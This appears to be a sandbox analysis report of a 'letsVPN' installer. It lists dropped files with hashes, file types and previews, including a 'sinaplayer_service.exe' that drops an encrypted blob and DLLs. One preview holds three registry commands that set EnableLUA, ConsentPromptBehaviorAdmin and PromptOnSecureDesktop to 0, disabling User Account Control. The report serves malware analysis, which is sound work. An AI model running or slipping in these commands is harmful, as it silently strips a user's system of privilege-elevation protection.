                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                  Process:C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe
                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):12288
                                                                                                                                                                                                  Entropy (8bit):5.804946284177748
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:ljHcQ0qWTlt7wi5Aj/lM0sEWD/wtYbBjpNQybC7y+XZqE0QPi:R/Qlt7wiij/lMRv/9V4bfr
                                                                                                                                                                                                  MD5:192639861E3DC2DC5C08BB8F8C7260D5
                                                                                                                                                                                                  SHA1:58D30E460609E22FA0098BC27D928B689EF9AF78
                                                                                                                                                                                                  SHA-256:23D618A0293C78CE00F7C6E6DD8B8923621DA7DD1F63A070163EF4C0EC3033D6
                                                                                                                                                                                                  SHA-512:6E573D8B2EF6ED719E271FD0B2FD9CD451F61FC9A9459330108D6D7A65A0F64016303318CAD787AA1D5334BA670D8F1C7C13074E1BE550B4A316963ECC465CDC
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PC bitmap, Windows 3.x format, 150 x 57 x 8, image size 8666, resolution 2834 x 2834 px/m, 255 important colors, cbSize 9740, bits offset 1074
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):9740
                                                                                                                                                                                                  Entropy (8bit):6.554125039233327
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:bDIK82wKywC116+rwdTKMRjwgKhww4R1jwlIHvNbmwQo8TTJG4:bv82wKywC7DrwdTKMRjwgKhwwY1jwlQq
                                                                                                                                                                                                  MD5:5ACF495828FEAE7F85E006B7774AF497
                                                                                                                                                                                                  SHA1:5D2EEF3EEBB9A72678DCCD404475341116508306
                                                                                                                                                                                                  SHA-256:6CFEBB59F0BA1B9F1E8D7AA6387F223A468EB2FF74A9ED3C3F4BB688C2B6455E
                                                                                                                                                                                                  SHA-512:D1D40C88E2167315A309005B831ACBEAB0919D5A3B1FF5AAA273DB945C8818FC2118EFDB503E4BDA055F309306E72224F54DEF0B1F0AB6F61FE4DBA66784ED68
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PC bitmap, Windows 3.x format, 164 x 314 x 8, image size 51498, resolution 2834 x 2834 px/m, 255 important colors, cbSize 52572, bits offset 1074
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):52572
                                                                                                                                                                                                  Entropy (8bit):7.144132089574
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:mfR2FYRtCc9X1uikvgqm+LPTTw9Bu8Skn+x23acmHjZXuxZpCAe9Crxpn319UDSQ:mf0YRt/km+b3wG0nt2UC6rOf
                                                                                                                                                                                                  MD5:7F8E1969B0874C8FB9AB44FC36575380
                                                                                                                                                                                                  SHA1:3057C9CE90A23D29F7D0854472F9F44E87B0F09A
                                                                                                                                                                                                  SHA-256:076221B4527FF13C3E1557ABBBD48B0CB8E5F7D724C6B9171C6AADADB80561DD
                                                                                                                                                                                                  SHA-512:7AA65CFADC2738C0186EF459D0F5F7F770BA0F6DA4CCD55A2CECA23627B7F13BA258136BAB88F4EEE5D9BB70ED0E8EB8BA8E1874B0280D2B08B69FC9BDD81555
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):9728
                                                                                                                                                                                                  Entropy (8bit):5.157714967617029
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:ooEv02zUu56FcS817eTaXx85qHFcUcxSgB5PKtAtoniJninnt3DVEB3YMNqkzfFc:ooEvCu5e81785qHFcU0PuAw0uyyIFc
                                                                                                                                                                                                  MD5:B7D61F3F56ABF7B7FF0D4E7DA3AD783D
                                                                                                                                                                                                  SHA1:15AB5219C0E77FD9652BC62FF390B8E6846C8E3E
                                                                                                                                                                                                  SHA-256:89A82C4849C21DFE765052681E1FAD02D2D7B13C8B5075880C52423DCA72A912
                                                                                                                                                                                                  SHA-512:6467C0DE680FADB8078BDAA0D560D2B228F5A22D4D8358A1C7D564C6EBCEFACE5D377B870EAF8985FBEE727001DA569867554154D568E3B37F674096BBAFAFB8
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):7168
                                                                                                                                                                                                  Entropy (8bit):5.295306975422517
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:JgzdzBzMDhOZZDbXf5GsWvSv1ckne94SDbYkvML1HT1fUNQaSGYuHIDQ:JDQHDb2vSuOc41ZfUNQZGdHA
                                                                                                                                                                                                  MD5:11092C1D3FBB449A60695C44F9F3D183
                                                                                                                                                                                                  SHA1:B89D614755F2E943DF4D510D87A7FC1A3BCF5A33
                                                                                                                                                                                                  SHA-256:2CD3A2D4053954DB1196E2526545C36DFC138C6DE9B81F6264632F3132843C77
                                                                                                                                                                                                  SHA-512:C182E0A1F0044B67B4B9FB66CEF9C4955629F6811D98BBFFA99225B03C43C33B1E85CACABB39F2C45EAD81CD85E98B201D5F9DA4EE0038423B1AD947270C134A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4608
                                                                                                                                                                                                  Entropy (8bit):4.703695912299512
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:Sz4joMeH+Iwdf8Rom/L+rOnnk5/OCnXeAdbdOAa4GPI+CJ87eILzlq7gthwIsEQW:64c/eFdfS/SSnkxNa4G+ueqPuCtGsj
                                                                                                                                                                                                  MD5:F0438A894F3A7E01A4AAE8D1B5DD0289
                                                                                                                                                                                                  SHA1:B058E3FCFB7B550041DA16BF10D8837024C38BF6
                                                                                                                                                                                                  SHA-256:30C6C3DD3CC7FCEA6E6081CE821ADC7B2888542DAE30BF00E881C0A105EB4D11
                                                                                                                                                                                                  SHA-512:F91FCEA19CBDDF8086AFFCB63FE599DC2B36351FC81AC144F58A80A524043DDEAA3943F36C86EBAE45DD82E8FAF622EA7B7C9B776E74C54B93DF2963CFE66CC7
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\Program Files (x86)\letsvpn\driver\tapinstall.exe
                                                                                                                                                                                                  File Type:Windows setup INFormation
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):7632
                                                                                                                                                                                                  Entropy (8bit):5.063558190257152
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:wr8tW9yCTi3x4vlQd22bjR+iAUC7bMP+io3DcNSj6jvKFkPs7EQTXvt1Ld4Z:LWlGNdkkzo3DcNSj6jvKFkPs7EQTXvtk
                                                                                                                                                                                                  MD5:26009F092BA352C1A64322268B47E0E3
                                                                                                                                                                                                  SHA1:E1B2220CD8DCAEF6F7411A527705BD90A5922099
                                                                                                                                                                                                  SHA-256:150EF8EB07532146F833DC020C02238161043260B8A565C3CFCB2365BAD980D9
                                                                                                                                                                                                  SHA-512:C18111982CA233A7FC5D1E893F9BD8A3ED739756A47651E0638DEBB0704066AF6B25942C7961CDEEDF953A206EB159FE50E0E10055C40B68EB0D22F6064BB363
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:; ****************************************************************************..; * Copyright (C) 2002-2014 OpenVPN Technologies, Inc. *..; * This program is free software; you can redistribute it and/or modify *..; * it under the terms of the GNU General Public License version 2 *..; * as published by the Free Software Foundation. *..; ****************************************************************************....; SYNTAX CHECKER..; cd \WINDDK\3790\tools\chkinf..; chkinf c:\src\openvpn\tap-win32\i386\oemvista.inf..; OUTPUT -> file:///c:/WINDDK/3790/tools/chkinf/htm/c%23+src+openvpn+tap-win32+i386+__OemWin2k.htm....; INSTALL/REMOVE DRIVER..; tapinstall install OemVista.inf tapoas..; tapinstall update OemVista.inf tapoas..; tapinstall remove tapoas....;*********************************************************..; Note to Developers:..;..; If you are bundling the TAP-Windows driver with your app,..; you should try
                                                                                                                                                                                                  Process:C:\Program Files (x86)\letsvpn\driver\tapinstall.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):10739
                                                                                                                                                                                                  Entropy (8bit):7.214364446291792
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:JDVLGVDFfap5UEwQl/WGhYCt17vJ4qnaj6jQc:7GCpzlnh3t1x4l2jn
                                                                                                                                                                                                  MD5:F73AC62E8DF97FAF3FC8D83E7F71BF3F
                                                                                                                                                                                                  SHA1:619A6E8F7A9803A4C71F73060649903606BEAF4E
                                                                                                                                                                                                  SHA-256:CC74CDB88C198EB00AEF4CAA20BF1FDA9256917713A916E6B94435CD4DCB7F7B
                                                                                                                                                                                                  SHA-512:F81F5757E0E449AD66A632299BCBE268ED02DF61333A304DCCAFB76B2AD26BAF1A09E7F837762EE4780AFB47D90A09BF07CB5B8B519C6FB231B54FA4FBE17FFE
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\Program Files (x86)\letsvpn\driver\tapinstall.exe
                                                                                                                                                                                                  File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):39920
                                                                                                                                                                                                  Entropy (8bit):6.338128217115975
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:XtCuL1O/+AphG3F9NlXt5oZhDzbV104mmuiExsFwQvYp33U35:XdCoTxk1lmmjExsFNvYtk
                                                                                                                                                                                                  MD5:C10CCDEC5D7AF458E726A51BB3CDC732
                                                                                                                                                                                                  SHA1:0553AAB8C2106ABB4120353360D747B0A2B4C94F
                                                                                                                                                                                                  SHA-256:589C5667B1602837205DA8EA8E92FE13F8C36048B293DF931C99B39641052253
                                                                                                                                                                                                  SHA-512:7437C12AE5B31E389DE3053A55996E7A0D30689C6E0D10BDE28F1FBF55CEE42E65AA441B7B82448334E725C0899384DEE2645CE5C311F3A3CFC68E42AD046981
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\Program Files (x86)\letsvpn\driver\tapinstall.exe
                                                                                                                                                                                                  File Type:Windows setup INFormation
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):7632
                                                                                                                                                                                                  Entropy (8bit):5.063558190257152
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:wr8tW9yCTi3x4vlQd22bjR+iAUC7bMP+io3DcNSj6jvKFkPs7EQTXvt1Ld4Z:LWlGNdkkzo3DcNSj6jvKFkPs7EQTXvtk
                                                                                                                                                                                                  MD5:26009F092BA352C1A64322268B47E0E3
                                                                                                                                                                                                  SHA1:E1B2220CD8DCAEF6F7411A527705BD90A5922099
                                                                                                                                                                                                  SHA-256:150EF8EB07532146F833DC020C02238161043260B8A565C3CFCB2365BAD980D9
                                                                                                                                                                                                  SHA-512:C18111982CA233A7FC5D1E893F9BD8A3ED739756A47651E0638DEBB0704066AF6B25942C7961CDEEDF953A206EB159FE50E0E10055C40B68EB0D22F6064BB363
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:; ****************************************************************************..; * Copyright (C) 2002-2014 OpenVPN Technologies, Inc. *..; * This program is free software; you can redistribute it and/or modify *..; * it under the terms of the GNU General Public License version 2 *..; * as published by the Free Software Foundation. *..; ****************************************************************************....; SYNTAX CHECKER..; cd \WINDDK\3790\tools\chkinf..; chkinf c:\src\openvpn\tap-win32\i386\oemvista.inf..; OUTPUT -> file:///c:/WINDDK/3790/tools/chkinf/htm/c%23+src+openvpn+tap-win32+i386+__OemWin2k.htm....; INSTALL/REMOVE DRIVER..; tapinstall install OemVista.inf tapoas..; tapinstall update OemVista.inf tapoas..; tapinstall remove tapoas....;*********************************************************..; Note to Developers:..;..; If you are bundling the TAP-Windows driver with your app,..; you should try
                                                                                                                                                                                                  Process:C:\Program Files (x86)\letsvpn\driver\tapinstall.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):10739
                                                                                                                                                                                                  Entropy (8bit):7.214364446291792
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:JDVLGVDFfap5UEwQl/WGhYCt17vJ4qnaj6jQc:7GCpzlnh3t1x4l2jn
                                                                                                                                                                                                  MD5:F73AC62E8DF97FAF3FC8D83E7F71BF3F
                                                                                                                                                                                                  SHA1:619A6E8F7A9803A4C71F73060649903606BEAF4E
                                                                                                                                                                                                  SHA-256:CC74CDB88C198EB00AEF4CAA20BF1FDA9256917713A916E6B94435CD4DCB7F7B
                                                                                                                                                                                                  SHA-512:F81F5757E0E449AD66A632299BCBE268ED02DF61333A304DCCAFB76B2AD26BAF1A09E7F837762EE4780AFB47D90A09BF07CB5B8B519C6FB231B54FA4FBE17FFE
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\Program Files (x86)\letsvpn\driver\tapinstall.exe
                                                                                                                                                                                                  File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):39920
                                                                                                                                                                                                  Entropy (8bit):6.338128217115975
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:XtCuL1O/+AphG3F9NlXt5oZhDzbV104mmuiExsFwQvYp33U35:XdCoTxk1lmmjExsFNvYtk
                                                                                                                                                                                                  MD5:C10CCDEC5D7AF458E726A51BB3CDC732
                                                                                                                                                                                                  SHA1:0553AAB8C2106ABB4120353360D747B0A2B4C94F
                                                                                                                                                                                                  SHA-256:589C5667B1602837205DA8EA8E92FE13F8C36048B293DF931C99B39641052253
                                                                                                                                                                                                  SHA-512:7437C12AE5B31E389DE3053A55996E7A0D30689C6E0D10BDE28F1FBF55CEE42E65AA441B7B82448334E725C0899384DEE2645CE5C311F3A3CFC68E42AD046981
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\Users\user\Desktop\letsVPN.exe
                                                                                                                                                                                                  File Type:ASCII text, with CR, LF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):392
                                                                                                                                                                                                  Entropy (8bit):5.141040221765098
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:jLMVjhR1mWEMlTLMVjhR1ZTLMVjhR16Xn:jIV1PMmIV1PZIV1P6X
                                                                                                                                                                                                  MD5:30D6EB22D6AEEC10347239B17B023BF4
                                                                                                                                                                                                  SHA1:E2A6F86D66C699F6E0FF1AC4E140AF4A2A4637D1
                                                                                                                                                                                                  SHA-256:659DF6B190A0B92FC34E3A4457B4A8D11A26A4CAF55DE64DFE79EB1276181F08
                                                                                                                                                                                                  SHA-512:500872C3F2F3F801EC51717690873194675CB7F32CC4A862C09D90C18638D364D49B0E04C32323F52734E5C806E3503A63AC755C7019D762786A72840123DF76
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
Preview:
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t reg_dword /d 0 /F
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t reg_dword /d 0 /F
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v PromptOnSecureDesktop /t reg_dword /d 0 /F
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Mon Dec 2 05:34:42 2024, mtime=Sun Dec 29 14:14:39 2024, atime=Mon Dec 2 05:34:42 2024, length=247840, window=hide
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1100
                                                                                                                                                                                                  Entropy (8bit):4.611535056478566
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:8mnpPiELbdOE4d7iAsD1dyOd/UUPX7qygm:8mnJVHdO77BsD1dyOdsRyg
                                                                                                                                                                                                  MD5:DEB11335AF5E06D15B28346CEB06189F
                                                                                                                                                                                                  SHA1:320E360BC51E86262406AD024E2F6FFF25A5F6B5
                                                                                                                                                                                                  SHA-256:8BE1AC7F41C71B3C11FFD491FC0753AD65246B0D0A9D977E606D9AC70022A76C
                                                                                                                                                                                                  SHA-512:64501C50E7AF93D4A61811791E52D9955C6548BDFF3616DB9ADA2971E39536F812DEBD7BF93DD868F8DB4EA34D3FD9344C91235D7CE8A1C76534A63240672E48
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
Preview: [binary shortcut data omitted; readable path: C:\Program Files (x86)\letsvpn\LetsPRO.exe]
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):824
                                                                                                                                                                                                  Entropy (8bit):3.377677862485207
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:8wl0Va/ledp8A/LK4YRMbdpYgRtbdpYqQ/CNUvH4t2YZ/elFlSJm:8BdOAW4Y+djXdYOUFqy
                                                                                                                                                                                                  MD5:0011458DE2BFE4556889186A69473E2A
                                                                                                                                                                                                  SHA1:03B075F79791A3EA20E0CA82DC375F1E980C4386
                                                                                                                                                                                                  SHA-256:DB3312C1A2D480E1416930D0F28A1EDA75143B3FDF312C1F19510534FD37B9FA
                                                                                                                                                                                                  SHA-512:DA5DD6E5A253F13702DEB42BBA8E37349CB262F311D557B8891AD761387AF2B96B6B91E4BF7E637D3A7C14E2BFE61E476E44703417DE79930B210243A1B20082
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
Preview: [binary shortcut data omitted; readable strings: Program Files (x86)\letsvpn\uninst.exe; C:\Program Files (x86)\letsvpn]
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Mon Dec 2 05:34:42 2024, mtime=Sun Dec 29 14:15:01 2024, atime=Mon Dec 2 05:34:42 2024, length=247840, window=hide
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1064
                                                                                                                                                                                                  Entropy (8bit):4.657443208752987
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:8m5iELbdOE4g4n7iAsDXdyOd/UUPX7qygm:8m5VHdOKg7BsDXdyOdsRyg
                                                                                                                                                                                                  MD5:384D2117F598DFFF44588166254CE440
                                                                                                                                                                                                  SHA1:8910055694CD4F3DD766403348DD82AB8B348B03
                                                                                                                                                                                                  SHA-256:4E8A7A3A305592E8B063538E615D4A7561C15F941FE06801FF14CA35F57994ED
                                                                                                                                                                                                  SHA-512:008F4E6D3A3ABC04A7E0FA541D9AE092DD351ED8647957BB45297C5A4D36ED83CA63397BBD3D89EF62E6EF5C0BF9801794175EA8DEDFF6488C86CE1FA01AAB76
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
Preview: [binary shortcut data omitted; readable path: C:\Program Files (x86)\letsvpn\LetsPRO.exe]
                                                                                                                                                                                                  Process:C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exe
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):258328
                                                                                                                                                                                                  Entropy (8bit):6.64001582449504
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:/BstfXX0BcNv96T+CZxJK30D62E9NTBqCmN1BIKXXuo:pI0Bc/Y5K3m62E9NTsCmNg2V
                                                                                                                                                                                                  MD5:68411B35F7B40B45AFC4A60A2681549D
                                                                                                                                                                                                  SHA1:98377319160E6DA97FD6E5D97AFE2441E0FE21A6
                                                                                                                                                                                                  SHA-256:5C3A73321F59CDC28164D79E8B60ECC57A90FF398A2CDBDE2BB718C8E9500D23
                                                                                                                                                                                                  SHA-512:CC509C4F41F86C9191BF5FBB826A362FFEF2BC78046B99356F944F39A17ED1AB17A6286FFE6AD03C290F6BBCE492F0DE96954B4C1075B27771C491C2CA027156
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):209725
                                                                                                                                                                                                  Entropy (8bit):7.999155296684028
                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                  SSDEEP:3072:bV6ppx9d6U0IqLcls38CNNvbW0ZouvuEVjzR00GSMtIILB/FjzpajiE5liIw8/K+:84Ibls3BNvb9ouxk9BLDzKiMiQ/Ko+y9
                                                                                                                                                                                                  MD5:242BB7507E0B2A8038F847830F926FEC
                                                                                                                                                                                                  SHA1:C391FC67566884065EB8A16961E5405D5B44677B
                                                                                                                                                                                                  SHA-256:7BAB7993F44F9835A44FC93CCE3D513FCBAE2395DAC085DB7F0748B2A21CCA32
                                                                                                                                                                                                  SHA-512:E0E4A997638BF95A558EBB877A2D5E64F2D3A2D2A81D7F15C4453B194E18F3A5BC07589EDB3BC18FDCE1996CFB50B0B00D1FFDF421002E37608EB861F3E7D36C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2482688
                                                                                                                                                                                                  Entropy (8bit):6.599322698372088
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:49152:HymviY7ZdM+3023FbNifZoGlBP3+IoA7YRAt+RB48UOexIFQHkaS5Jv/PfT:HziCdt3023FbNifZ1D3+IoEt+RS8UOel
                                                                                                                                                                                                  MD5:72ADFBFC97B1F1E7ABA3F63CD264C0B2
                                                                                                                                                                                                  SHA1:93DFEBD64B0FC0AA932E23A5D4E6A32CEBE7CF32
                                                                                                                                                                                                  SHA-256:77762C479E46D1DF205EB020D4C1AF5CCD8E433111DC63BE53B2401C7B8257AC
                                                                                                                                                                                                  SHA-512:7AF6E43B7C6086646D1CAC37234658722ABDF466689AB58459468095722E66DB0ED008DA5B2F731D8FB28F60F52EA1FD0C3501C47A79678EB1F6392AF61CB004
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):455328
                                                                                                                                                                                                  Entropy (8bit):6.698367093574994
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12288:uZ/8wcqw2oe+Z3VrfwfNOOoWhUgiW6QR7t5ss3Ooc8DHkC2e77/:W/8wVwHZFTwFOOos3Ooc8DHkC2e77/
                                                                                                                                                                                                  MD5:FD5CABBE52272BD76007B68186EBAF00
                                                                                                                                                                                                  SHA1:EFD1E306C1092C17F6944CC6BF9A1BFAD4D14613
                                                                                                                                                                                                  SHA-256:87C42CA155473E4E71857D03497C8CBC28FA8FF7F2C8D72E8A1F39B71078F608
                                                                                                                                                                                                  SHA-512:1563C8257D85274267089CD4AEAC0884A2A300FF17F84BDB64D567300543AA9CD57101D8408D0077B01A600DDF2E804F7890902C2590AF103D2C53FF03D9E4A5
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):970912
                                                                                                                                                                                                  Entropy (8bit):6.9649735952029515
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12288:LBmFyjLAOQaYkxGXPfY7eiWWcpOKnpTVOIxhK765qlRRb6x4pI23IbJQV:dmFyjLF847eiWWcoGZVOIxh/WxIAIbGV
                                                                                                                                                                                                  MD5:034CCADC1C073E4216E9466B720F9849
                                                                                                                                                                                                  SHA1:F19E9D8317161EDC7D3E963CC0FC46BD5E4A55A1
                                                                                                                                                                                                  SHA-256:86E39B5995AF0E042FCDAA85FE2AEFD7C9DDC7AD65E6327BD5E7058BC3AB615F
                                                                                                                                                                                                  SHA-512:5F11EF92D936669EE834A5CEF5C7D0E7703BF05D03DC4F09B9DCFE048D7D5ADFAAB6A9C7F42E8080A5E9AAD44A35F39F3940D5CCA20623D9CAFE373C635570F7
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\Windows\System32\drvinst.exe
                                                                                                                                                                                                  File Type:Windows setup INFormation
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):7632
                                                                                                                                                                                                  Entropy (8bit):5.063558190257152
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:wr8tW9yCTi3x4vlQd22bjR+iAUC7bMP+io3DcNSj6jvKFkPs7EQTXvt1Ld4Z:LWlGNdkkzo3DcNSj6jvKFkPs7EQTXvtk
                                                                                                                                                                                                  MD5:26009F092BA352C1A64322268B47E0E3
                                                                                                                                                                                                  SHA1:E1B2220CD8DCAEF6F7411A527705BD90A5922099
                                                                                                                                                                                                  SHA-256:150EF8EB07532146F833DC020C02238161043260B8A565C3CFCB2365BAD980D9
